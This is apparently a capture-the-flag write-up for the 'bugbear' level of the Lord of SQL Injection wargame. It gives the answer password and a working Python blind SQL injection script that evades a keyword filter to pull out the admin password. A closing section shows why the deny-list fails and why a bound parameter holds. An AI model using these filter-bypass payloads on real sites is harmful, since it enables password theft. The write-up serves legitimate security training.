LOS - bugbear / level 13
Problem Solving / Lord Of SQL, 2024. 6. 29. 17:16
Problem
Solution
Solve it with blind SQL injection, using bit masking.
Because ' / substr / ascii / = / or / and / (space) / like / 0x are filtered on pw,
bypass them with " / mid / in / || / %26%26 respectively.
Answer
?pw=52dc3991
Code
```python
# LOS - bugbear
import requests

url = "your url"
cookie = {"PHPSESSID": "your session"}
user = "admin"


def find_length(url, cookie, user):
    # Increase i until "length(pw) > i" stops being true; i is then the length.
    i = 1
    while True:
        # %09 (tab) stands in for the filtered space, %26%26 is "&&", %23 is "#".
        params = f"?no=1%09||%09id%09in%09(%22{user}%22)%09%26%26%09length(pw)%09>%09{i}%23"
        send_url = url + params
        res = requests.get(send_url, cookies=cookie)
        print(str(res.status_code) + " " + params)
        # "Hello admin" in the response is the true/false signal.
        if "Hello admin" not in res.text:
            break
        i += 1
    print(f"\nlength : {i}")
    return i


def blind(url, cookie, user, length):
    # Recover pw one position at a time by testing each candidate character.
    result_str = ""
    for i in range(1, length + 1):
        find_str = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
        for k in range(len(find_str)):
            # mid() replaces substr, in (...) replaces "=", double quotes replace '.
            params = f"?no=1%09||%09id%09in%09(%22{user}%22)%09%26%26mid(pw,{i},1)%09in%09(%22{find_str[k]}%22)%23"
            send_url = url + params
            res = requests.get(send_url, cookies=cookie)
            print(find_str[k], end=" ", flush=True)
            if "Hello admin" in res.text:
                result_str = result_str + find_str[k]
                break
    print(f"\nresult : {result_str}")
    return result_str


length = find_length(url, cookie, user)
result = blind(url, cookie, user, length)
print(result)
```
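Why the token filter described above lets this request through while an allow-list plus a bound parameter does not, as an added example (not part of the original post and not the challenge's source). The `users` table, its rows and the function names are constructed for illustration, and the deny-list is modelled only on the token list given in this write-up.

```python
import re
import sqlite3
from urllib.parse import unquote

# Deny-list modelled on the tokens this write-up says are filtered
# (assumption: the challenge's real filter code is not shown on the page).
BLOCKED = re.compile(r"'|substr|ascii|=|or|and| |like|0x", re.IGNORECASE)

# The `no` value sent by find_length() above (user=admin, i=1), URL-decoded.
PAGE_PAYLOAD = unquote(
    "1%09||%09id%09in%09(%22admin%22)%09%26%26%09length(pw)%09>%091%23"
)


def denylist_allows(value: str) -> bool:
    """Deny-list check: True when none of the blocked tokens appear."""
    return BLOCKED.search(value) is None


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table; the names and rows are sample data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (no INTEGER, id TEXT, pw TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "guest", "constructed-guest-pw"), (2, "admin", "constructed-admin-pw")],
    )
    return db


def lookup_hardened(db: sqlite3.Connection, raw_no: str):
    """Accept only a short decimal integer, then pass it as a bound parameter."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_no):
        return None  # rejected before any SQL text is built
    row = db.execute("SELECT id FROM users WHERE no = ?", (int(raw_no),)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("deny-list passes the page's payload:", denylist_allows(PAGE_PAYLOAD))
    print("hardened lookup on the payload:", lookup_hardened(db, PAGE_PAYLOAD))
    print("hardened lookup on '2':", lookup_hardened(db, "2"))
```

The deny-list fails because tab, `||`, `&&`, `in`, `mid` and double quotes are all equivalents it never listed; the hardened path never needs such a list because the input is constrained to digits and is never concatenated into the query.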